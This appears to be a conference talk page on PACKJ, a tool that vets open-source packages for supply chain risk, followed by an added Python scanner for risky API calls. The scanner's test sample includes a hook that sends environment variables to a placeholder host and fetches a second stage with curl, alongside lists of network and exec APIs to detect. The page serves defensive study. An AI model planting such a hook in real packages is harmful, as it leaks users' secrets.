PACKJ
Presentation Material
Abstract
From a benign left-pad beginning to recent protestware, software supply chain attacks on open-source package managers such as NPM and PyPI have multiplied. Bad actors today leverage highly sophisticated techniques such as typo-squatting, repo-jacking, and social engineering to “supply” malicious code. Yet there is no robust way to analyze packages and measure risk. Metrics such as GitHub stars and forks are attacker-controlled and can be faked.
In this presentation, we will present a data-driven security analysis framework, called PACKJ, to measure and control the level of potential supply chain risk when adopting open-source packages. The framework relies on empirically identified (and validated) “risky” code and metadata attributes that make a package vulnerable to supply chain attacks. Examples include the use of filesystem/network APIs, lack of two-factor authentication, and metadata impersonation. PACKJ employs static code analysis, dynamic tracing, and metadata checks to detect the presence (or absence) of such risky attributes.
Using our security framework, we have built a large-scale automated system for continuous vetting of packages, and have already identified several abandoned and malicious packages. In this presentation, we will discuss our tool, highlight our findings as well as different types of attacks, and demo our tool to detect “risky” packages and mitigate supply chain attacks.
AI Generated Summary
The talk addresses the critical security risks in software supply chains stemming from widely used package managers (npm, PyPI, RubyGems). It highlights the massive scale of open-source consumption, where modern applications incorporate hundreds of transitive dependencies, creating a vast attack surface. Unlike accidental vulnerabilities (CVEs), supply chain attacks involve intentional malware injection, with techniques including typo-squatting (malicious packages with misspelled names), dependency confusion (exploiting installers that prefer a higher version number published on the public registry over an internal package of the same name), account hijacking through expired maintainer email domains, and sabotage by rogue maintainers.
Existing security tools primarily flag known CVEs but fail to detect novel malicious intent. To counter this, the presentation introduces Packj, a developer-focused vetting tool that applies a zero-trust model to every dependency. It combines metadata analysis (validating maintainer emails, detecting abandoned packages, verifying GitHub repository provenance, and identifying star-jacking) with static analysis (flagging sensitive API calls such as file access, network exfiltration, and code execution) and runtime analysis (comparing behavioral traces across versions to spot anomalies). The tool is customizable to an organization's risk thresholds, reducing alert fatigue.
The practical implication is that enterprises must proactively vet dependencies rather than rely on the package manager's implicit trust. Packj automates this by flagging risks such as expired maintainer email domains (which enable account hijacking), sudden updates to long-dormant packages, and suspicious code behaviors. Case studies, including the ctx PyPI package hijack and the colors.js sabotage, demonstrate how the tool's multi-layered analysis would have identified these threats. The core takeaway is that securing the supply chain requires continuous, automated scrutiny of package integrity and behavior beyond conventional vulnerability databases.
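The following is an added, self-contained illustration of the static-analysis layer described in the summary (flagging sensitive file, network, process and code-execution APIs) together with a static version of the cross-version comparison idea: it lists the capabilities a new release gains over the previous one, which is the pattern behind the colors.js case. It is example code written for this page, not Packj's own implementation; the API categories, the two constructed package versions (V1, V2) and the function names are this example's assumptions.

```python
"""Minimal static 'risky API' scanner for Python packages (example, not Packj)."""
import ast

# Constructed allow-list of sensitive APIs grouped by capability.
# The grouping is an assumption for this example, not Packj's rule set.
RISKY_CALLS = {
    "filesystem": {"open", "os.remove", "os.unlink", "shutil.rmtree", "os.listdir"},
    "network": {"socket.socket", "urllib.request.urlopen", "requests.get",
                "requests.post", "http.client.HTTPConnection"},
    "process": {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
                "subprocess.call", "subprocess.check_output"},
    "code_exec": {"eval", "exec", "compile", "__import__", "importlib.import_module"},
}
# Sensitive attribute reads (not calls), e.g. dumping the whole environment.
RISKY_ATTRS = {"env": {"os.environ"}}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class RiskyApiFinder(ast.NodeVisitor):
    """Walk a module, resolve import aliases, and record sensitive API uses."""

    def __init__(self):
        self.aliases = {}   # local binding -> fully qualified name
        self.findings = []  # (lineno, category, qualified api name)

    def visit_Import(self, node):
        for a in node.names:
            if a.asname:                       # import subprocess as sp
                self.aliases[a.asname] = a.name
            else:                              # import urllib.request -> binds 'urllib'
                top = a.name.split(".")[0]
                self.aliases[top] = top
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        if node.module and node.level == 0:    # skip relative imports
            for a in node.names:               # from urllib.request import urlopen
                self.aliases[a.asname or a.name] = f"{node.module}.{a.name}"
        self.generic_visit(node)

    def _qualify(self, name):
        head, _, rest = name.partition(".")
        full = self.aliases.get(head, head)
        return f"{full}.{rest}" if rest else full

    def visit_Call(self, node):
        name = _dotted_name(node.func)
        if name:
            full = self._qualify(name)
            for category, apis in RISKY_CALLS.items():
                if full in apis:
                    self.findings.append((node.lineno, category, full))
        self.generic_visit(node)               # also reach nested calls, e.g. exec(compile(...))

    def visit_Attribute(self, node):
        name = _dotted_name(node)
        if name:
            full = self._qualify(name)
            for category, attrs in RISKY_ATTRS.items():
                if full in attrs:
                    self.findings.append((node.lineno, category, full))
        self.generic_visit(node)


def scan_source(src):
    """Return sorted (lineno, category, api) findings for one module's source."""
    finder = RiskyApiFinder()
    finder.visit(ast.parse(src))
    return sorted(finder.findings)


def capabilities(src):
    return {category for _, category, _ in scan_source(src)}


def new_capabilities(old_src, new_src):
    """Capabilities present in the new version but absent from the old one."""
    return capabilities(new_src) - capabilities(old_src)


# Constructed sample: a benign string utility, and a later release of the same
# package that grows an environment-stealing, downloading, code-executing hook.
V1 = '''
def left_pad(s, n, ch=" "):
    return ch * (n - len(s)) + s
'''

V2 = '''
import os
import subprocess as sp
from urllib.request import urlopen

def left_pad(s, n, ch=" "):
    return ch * (n - len(s)) + s

def _collect():
    secrets = dict(os.environ)
    urlopen("http://example.invalid/x", data=str(secrets).encode())
    sp.run(["curl", "http://example.invalid/stage2"], capture_output=True)
    exec(compile("print(1)", "<s>", "exec"))
'''

if __name__ == "__main__":
    for lineno, category, api in scan_source(V2):
        print(f"line {lineno:>3}  {category:<10} {api}")
    print("capabilities gained since V1:", sorted(new_capabilities(V1, V2)))
```

Alias resolution matters in practice: a package that writes `from urllib.request import urlopen` or `import subprocess as sp` must still resolve to the same qualified API, otherwise a trivial rename defeats the check. A real vetting pipeline would run this over every module in the distribution (including `setup.py`, where install-time hooks live) and combine the result with the metadata and runtime checks the talk describes.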